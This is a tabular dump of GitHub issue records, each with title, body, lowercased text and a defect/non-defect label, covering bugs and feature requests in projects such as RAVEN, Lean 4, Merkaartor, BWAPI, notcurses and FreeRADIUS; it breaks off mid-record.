Add category filters to logger - The current logging solution doesn't work well because we get all or nothing.
Implement a robust logging solution.
|
non_defect
|
add category filters to logger the current logging solution doesn t work well because we get all or nothing implement a robust logging solution
| 0
|
38,254
| 8,710,950,527
|
IssuesEvent
|
2018-12-06 17:46:20
|
idaholab/raven
|
https://api.github.com/repos/idaholab/raven
|
opened
|
Fix raven on cluster.
|
defect priority_minor
|
--------
Issue Description
--------
##### What did you expect to see happen?
Raven to work on the cluster.
##### What did you see instead?
It fails, and it is my fault for adding matplotlib to conda-forge.
##### Do you have a suggested fix for the development team?
Add matplotlib to conda-forge only for python 3.
##### Please attach the input file(s) that generate this error. The simpler the input, the faster we can find the issue.
```./run_tests -j3 --re=InternalParallelTests```
----------------
For Change Control Board: Issue Review
----------------
This review should occur before any development is performed as a response to this issue.
- [x] 1. Is it tagged with a type: defect or task?
- [x] 2. Is it tagged with a priority: critical, normal or minor?
- [x] 3. If it will impact requirements or requirements tests, is it tagged with requirements?
- [x] 4. If it is a defect, can it cause wrong results for users? If so an email needs to be sent to the users. (No, just causes fails in parallel python on the cluster)
- [x] 5. Is a rationale provided? (Such as explaining why the improvement is needed or why current code is wrong.)
-------
For Change Control Board: Issue Closure
-------
This review should occur when the issue is imminently going to be closed.
- [ ] 1. If the issue is a defect, is the defect fixed?
- [ ] 2. If the issue is a defect, is the defect tested for in the regression test system? (If not explain why not.)
- [ ] 3. If the issue can impact users, has an email to the users group been written (the email should specify if the defect impacts stable or master)?
- [ ] 4. If the issue is a defect, does it impact the latest release branch? If yes, is there any issue tagged with release (create if needed)?
- [ ] 5. If the issue is being closed without a pull request, has an explanation of why it is being closed been provided?
|
1.0
|
Fix raven on cluster. - --------
Issue Description
--------
##### What did you expect to see happen?
Raven to work on the cluster.
##### What did you see instead?
It fails, and it is my fault for adding matplotlib to conda-forge.
##### Do you have a suggested fix for the development team?
Add matplotlib to conda-forge only for python 3.
##### Please attach the input file(s) that generate this error. The simpler the input, the faster we can find the issue.
```./run_tests -j3 --re=InternalParallelTests```
----------------
For Change Control Board: Issue Review
----------------
This review should occur before any development is performed as a response to this issue.
- [x] 1. Is it tagged with a type: defect or task?
- [x] 2. Is it tagged with a priority: critical, normal or minor?
- [x] 3. If it will impact requirements or requirements tests, is it tagged with requirements?
- [x] 4. If it is a defect, can it cause wrong results for users? If so an email needs to be sent to the users. (No, just causes fails in parallel python on the cluster)
- [x] 5. Is a rationale provided? (Such as explaining why the improvement is needed or why current code is wrong.)
-------
For Change Control Board: Issue Closure
-------
This review should occur when the issue is imminently going to be closed.
- [ ] 1. If the issue is a defect, is the defect fixed?
- [ ] 2. If the issue is a defect, is the defect tested for in the regression test system? (If not explain why not.)
- [ ] 3. If the issue can impact users, has an email to the users group been written (the email should specify if the defect impacts stable or master)?
- [ ] 4. If the issue is a defect, does it impact the latest release branch? If yes, is there any issue tagged with release (create if needed)?
- [ ] 5. If the issue is being closed without a pull request, has an explanation of why it is being closed been provided?
|
defect
|
fix raven on cluster issue description what did you expect to see happen raven to work on the cluster what did you see instead it fails and it is my fault for adding matplotlib to conda forge do you have a suggested fix for the development team add matplotlib to conda forge only for python please attach the input file s that generate this error the simpler the input the faster we can find the issue run tests re internalparalleltests for change control board issue review this review should occur before any development is performed as a response to this issue is it tagged with a type defect or task is it tagged with a priority critical normal or minor if it will impact requirements or requirements tests is it tagged with requirements if it is a defect can it cause wrong results for users if so an email needs to be sent to the users no just causes fails in parallel python on the cluster is a rationale provided such as explaining why the improvement is needed or why current code is wrong for change control board issue closure this review should occur when the issue is imminently going to be closed if the issue is a defect is the defect fixed if the issue is a defect is the defect tested for in the regression test system if not explain why not if the issue can impact users has an email to the users group been written the email should specify if the defect impacts stable or master if the issue is a defect does it impact the latest release branch if yes is there any issue tagged with release create if needed if the issue is being closed without a pull request has an explanation of why it is being closed been provided
| 1
|
179,175
| 14,693,245,250
|
IssuesEvent
|
2021-01-03 07:48:18
|
dankamongmen/notcurses
|
https://api.github.com/repos/dankamongmen/notcurses
|
closed
|
update notcurses.3 to include piles
|
bug documentation
|
As of 2.1.2+, the `notcurses.3` library summary man page doesn't mention piles, despite running through the remaining Notcurses model. Update it to include this, and redo the `THREADING` section to reflect it.
Honestly, we could probably spend a few hours very profitably going over all the man pages.
|
1.0
|
update notcurses.3 to include piles - As of 2.1.2+, the `notcurses.3` library summary man page doesn't mention piles, despite running through the remaining Notcurses model. Update it to include this, and redo the `THREADING` section to reflect it.
Honestly, we could probably spend a few hours very profitably going over all the man pages.
|
non_defect
|
update notcurses to include piles as of the notcurses library summary man page doesn t mention piles despite running through the remaining notcurses model update it to include this and redo the threading section to reflect it honestly we could probably spend a few hours very profitably going over all the man pages
| 0
|
61,044
| 17,023,586,799
|
IssuesEvent
|
2021-07-03 02:47:41
|
tomhughes/trac-tickets
|
https://api.github.com/repos/tomhughes/trac-tickets
|
closed
|
Display problems when loading tiles
|
Component: merkaartor Priority: minor Resolution: fixed Type: defect
|
**[Submitted to the original trac issue database at 5.55pm, Saturday, 8th May 2010]**
This bug was originally reported via launchpad:
https://bugs.launchpad.net/ubuntu/+source/merkaartor/+bug/575127
"OS: Ubuntu 10.04 64bits.
When loading new tiles (zooming or moving the map), strange red grids and tiles parts appear, melted. Sometimes, no map is shown even when all tiles are loaded.
As in ubuntu 9.10 64bits, maps tiles should load smoothly without display bugs."
The launchpad report also provides a video.
http://launchpadlibrarian.net/47857800/merkaartor_display_problem-1.ogv
Ubuntu 10.04 bundles 0.14+svnfixes~20090912-2build1. 9.10 seems to have used 0.13.2.
https://code.launchpad.net/~ubuntu-branches/ubuntu/karmic/merkaartor/karmic
I also saw/see this behavior in all svn/git revisions for several months -- even
under Ubuntu 9.10 64bits. If the original reporter did not see this behaviour with
9.10 he was probably using 0.13.2.
A workaround for me is to enable "Show downloaded areas". As this forces merkaartor to
initialize the whole viewport somehow I could imagine that the bug is related to how
qt issues its paint commands to the xorg / xorg driver (intel 82G965 in my case).
But in the video "Show downloaded areas" seems to be enabled and the bug still occurs.
|
1.0
|
Display problems when loading tiles - **[Submitted to the original trac issue database at 5.55pm, Saturday, 8th May 2010]**
This bug was originally reported via launchpad:
https://bugs.launchpad.net/ubuntu/+source/merkaartor/+bug/575127
"OS: Ubuntu 10.04 64bits.
When loading new tiles (zooming or moving the map), strange red grids and tiles parts appear, melted. Sometimes, no map is shown even when all tiles are loaded.
As in ubuntu 9.10 64bits, maps tiles should load smoothly without display bugs."
The launchpad report also provides a video.
http://launchpadlibrarian.net/47857800/merkaartor_display_problem-1.ogv
Ubuntu 10.04 bundles 0.14+svnfixes~20090912-2build1. 9.10 seems to have used 0.13.2.
https://code.launchpad.net/~ubuntu-branches/ubuntu/karmic/merkaartor/karmic
I also saw/see this behavior in all svn/git revisions for several months -- even
under Ubuntu 9.10 64bits. If the original reporter did not see this behaviour with
9.10 he was probably using 0.13.2.
A workaround for me is to enable "Show downloaded areas". As this forces merkaartor to
initialize the whole viewport somehow I could imagine that the bug is related to how
qt issues its paint commands to the xorg / xorg driver (intel 82G965 in my case).
But in the video "Show downloaded areas" seems to be enabled and the bug still occurs.
|
defect
|
display problems when loading tiles this bug was originally reported via launchpad os ubuntu when loading new tiles zooming or moving the map strange red grids and tiles parts appear melted sometimes no map is shown even when all tiles are loaded as in ubuntu maps tiles should load smoothly without display bugs the launchpad report also provides a video ubuntu bundles svnfixes seems to have used i also saw see this behavior in all svn git revisions for several months even under ubuntu if the original reporter did not see this behaviour with he was probably using a workaround for me is to enable show downloaded areas as this forces merkaartor to initialize the whole viewport somehow i could imagine that the bug is related to how qt issues its paint commands to the xorg xorg driver intel in my case but in the video show downloaded areas seems to be enabled and the bug still occurs
| 1
|
1,194
| 2,601,756,800
|
IssuesEvent
|
2015-02-24 00:33:21
|
chrsmith/bwapi
|
https://api.github.com/repos/chrsmith/bwapi
|
closed
|
Fix Unit::getUpgradeLevel for BWAPI Client
|
auto-migrated Priority-Medium Type-Defect
|
```
Never got around to implementing this correctly when making the initial
implementation of BWAPI Client. It currently incorrectly returns 0 for enemy
units when complete map info is disabled since Player::getUpgradeLevel returns
0 for enemy units when complete map info is disabled.
```
-----
Original issue reported on code.google.com by `lowerlo...@gmail.com` on 22 Oct 2010 at 4:29
|
1.0
|
Fix Unit::getUpgradeLevel for BWAPI Client - ```
Never got around to implementing this correctly when making the initial
implementation of BWAPI Client. It currently incorrectly returns 0 for enemy
units when complete map info is disabled since Player::getUpgradeLevel returns
0 for enemy units when complete map info is disabled.
```
-----
Original issue reported on code.google.com by `lowerlo...@gmail.com` on 22 Oct 2010 at 4:29
|
defect
|
fix unit getupgradelevel for bwapi client never got around to implementing this correctly when making the initial implementation of bwapi client it currently incorrectly returns for enemy units when complete map info is disabled since player getupgradelevel returns for enemy units when complete map info is disabled original issue reported on code google com by lowerlo gmail com on oct at
| 1
|
11,486
| 7,261,653,265
|
IssuesEvent
|
2018-02-18 22:51:02
|
trailofbits/deepstate
|
https://api.github.com/repos/trailofbits/deepstate
|
opened
|
Describe features and benefits in Readme
|
usability
|
[Algo](https://github.com/trailofbits/algo) does this well. Before jumping into the building and installation instructions, we should be describing why someone would want to use DeepState and what specific features it provides.
|
True
|
Describe features and benefits in Readme - [Algo](https://github.com/trailofbits/algo) does this well. Before jumping into the building and installation instructions, we should be describing why someone would want to use DeepState and what specific features it provides.
|
non_defect
|
describe features and benefits in readme does this well before jumping into the building and installation instructions we should be describing why someone would want to use deepstate and what specific features it provides
| 0
|
53,212
| 28,026,451,670
|
IssuesEvent
|
2023-03-28 09:26:38
|
leanprover/lean4
|
https://api.github.com/repos/leanprover/lean4
|
closed
|
TC synthesis of types with mvars should be optimized
|
performance
|
I'm observing traces such as
```
[Meta.synthInstance] [0.127923s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => ?m.9005 → ?m.9005[X]
[Meta.synthInstance] [0.000018s] new goal CoeFun (?m.9005 →+* ?m.9005[X]) _tc.0
[Meta.synthInstance.instances] #[@FunLike.hasCoeToFun]
[Meta.synthInstance] [0.000327s] ✅ apply @FunLike.hasCoeToFun to CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a
[Meta.synthInstance.tryResolve] [0.000238s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a ≟ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => (a : ?m.9090) → ?m.9091 a
[Meta.synthInstance] [0.000039s] new goal FunLike (?m.9005 →+* ?m.9005[X]) _tc.2 _tc.3
[Meta.synthInstance.instances] #[@EmbeddingLike.toFunLike, @ZeroHomClass.toFunLike, @AddHomClass.toFunLike, @OneHomClass.toFunLike, @MulHomClass.toFunLike, @RelHomClass.toFunLike, @SMulHomClass.toFunLike, @StarHomClass.toFunLike, @NonnegHomClass.toFunLike, @SubadditiveHomClass.toFunLike, @SubmultiplicativeHomClass.toFunLike, @MulLEAddHomClass.toFunLike, @NonarchimedeanHomClass.toFunLike, @TopHomClass.toFunLike, @BotHomClass.toFunLike, @SupHomClass.toFunLike, @InfHomClass.toFunLike, @SupₛHomClass.toFunLike, @InfₛHomClass.toFunLike]
[Meta.synthInstance] [0.000087s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000032s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000037s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000020s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29960))
[Meta.synthInstance] [0.000076s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000029s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000031s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29992))
[Meta.synthInstance] [0.000081s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000026s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000038s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000021s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30023))
[Meta.synthInstance] [0.000073s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000027s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000030s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30055))
... <many more bombs>
```
I'm assuming the fact that we try to apply instances that we should know will fail is due to
https://github.com/leanprover/lean4/blob/9bc6fa1c6ef2ad7056adb113350c955e5d516bc5/src/Lean/Meta/DiscrTree.lean#L425-L439
It should probably be possible to have the discrimination tree return a flag expressing that some instances were omitted because of read-only mvars and then throw the stuck exception when no other instance applies instead of returning and trying them all.
|
True
|
TC synthesis of types with mvars should be optimized - I'm observing traces such as
```
[Meta.synthInstance] [0.127923s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => ?m.9005 → ?m.9005[X]
[Meta.synthInstance] [0.000018s] new goal CoeFun (?m.9005 →+* ?m.9005[X]) _tc.0
[Meta.synthInstance.instances] #[@FunLike.hasCoeToFun]
[Meta.synthInstance] [0.000327s] ✅ apply @FunLike.hasCoeToFun to CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a
[Meta.synthInstance.tryResolve] [0.000238s] ✅ CoeFun (?m.9005 →+* ?m.9005[X]) fun x =>
(a : ?m.9090) → ?m.9091 a ≟ CoeFun (?m.9005 →+* ?m.9005[X]) fun x => (a : ?m.9090) → ?m.9091 a
[Meta.synthInstance] [0.000039s] new goal FunLike (?m.9005 →+* ?m.9005[X]) _tc.2 _tc.3
[Meta.synthInstance.instances] #[@EmbeddingLike.toFunLike, @ZeroHomClass.toFunLike, @AddHomClass.toFunLike, @OneHomClass.toFunLike, @MulHomClass.toFunLike, @RelHomClass.toFunLike, @SMulHomClass.toFunLike, @StarHomClass.toFunLike, @NonnegHomClass.toFunLike, @SubadditiveHomClass.toFunLike, @SubmultiplicativeHomClass.toFunLike, @MulLEAddHomClass.toFunLike, @NonarchimedeanHomClass.toFunLike, @TopHomClass.toFunLike, @BotHomClass.toFunLike, @SupHomClass.toFunLike, @InfHomClass.toFunLike, @SupₛHomClass.toFunLike, @InfₛHomClass.toFunLike]
[Meta.synthInstance] [0.000087s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000032s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000037s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000020s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29960))
[Meta.synthInstance] [0.000076s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000029s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000031s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29992))
[Meta.synthInstance] [0.000081s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000026s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000038s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000021s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30023))
[Meta.synthInstance] [0.000073s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000027s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000030s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30055))
... <many more bombs>
```
I'm assuming the fact that we try to apply instances that we should know will fail is due to
https://github.com/leanprover/lean4/blob/9bc6fa1c6ef2ad7056adb113350c955e5d516bc5/src/Lean/Meta/DiscrTree.lean#L425-L439
It should probably be possible to have the discrimination tree return a flag expressing that some instances were omitted because of read-only mvars and then throw the stuck exception when no other instance applies instead of returning and trying them all.
|
non_defect
|
tc synthesis of types with mvars should be optimized i m observing traces such as ✅ coefun m → m fun x m → m new goal coefun m → m tc ✅ apply funlike hascoetofun to coefun m → m fun x a m → m a ✅ coefun m → m fun x a m → m a ≟ coefun m → m fun x a m → m a new goal funlike m → m tc tc 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice algebra instcompletela tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice algebra instcompletela 
tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice algebra instcompletela tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice 
algebra instcompletela tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m i m assuming the fact that we try to apply instances that we should know will fail is due to it should probably be possible to have the discrimination tree return a flag expressing that some instances were omitted because of read only mvars and then throw the stuck exception when no other instance applies instead of returning and trying them all
| 0
|
153,181
| 24,083,706,919
|
IssuesEvent
|
2022-09-19 09:01:47
|
liqd/liqd-site
|
https://api.github.com/repos/liqd/liqd-site
|
closed
|
6060 intro text LA landing page box too big on large desktop screens
|
Type: UX/UI or design
|
**URL:** https://dev.liqd.net/de/academy-landing-page-test/
**user:** visitor
**expected behaviour:** less space around intro text/ smaller box with gradient background
**behaviour:** gradient background of intro text covers half of the page
**important screensize:**desktop, 1920px and more
**device & browser:** chrome, max
**Comment/Question:**
@mcastro-lqd Is this the intended design?
Screenshot?

|
1.0
|
6060 intro text LA landing page box too big on large desktop screens - **URL:** https://dev.liqd.net/de/academy-landing-page-test/
**user:** visitor
**expected behaviour:** less space around intro text/ smaller box with gradient background
**behaviour:** gradient background of intro text covers half of the page
**important screensize:**desktop, 1920px and more
**device & browser:** chrome, max
**Comment/Question:**
@mcastro-lqd Is this the intended design?
Screenshot?

|
non_defect
|
intro text la landing page box too big on large desktop screens url user visitor expected behaviour less space around intro text smaller box with gradient background behaviour gradient background of intro text covers half of the page important screensize desktop and more device browser chrome max comment question mcastro lqd is this the intended design screenshot
| 0
|
20,398
| 3,352,670,766
|
IssuesEvent
|
2015-11-17 23:54:37
|
FreeRADIUS/freeradius-server
|
https://api.github.com/repos/FreeRADIUS/freeradius-server
|
opened
|
listeners no longer bound correctly to virtual servers
|
defect v3.1.x
|
Lots of other things to do... Should be easy to replicate.
|
1.0
|
listeners no longer bound correctly to virtual servers - Lots of other things to do... Should be easy to replicate.
|
defect
|
listeners no longer bound correctly to virtual servers lots of other things to do should be easy to replicate
| 1
|
17,112
| 10,603,748,052
|
IssuesEvent
|
2019-10-10 16:37:54
|
MicrosoftDocs/azure-docs
|
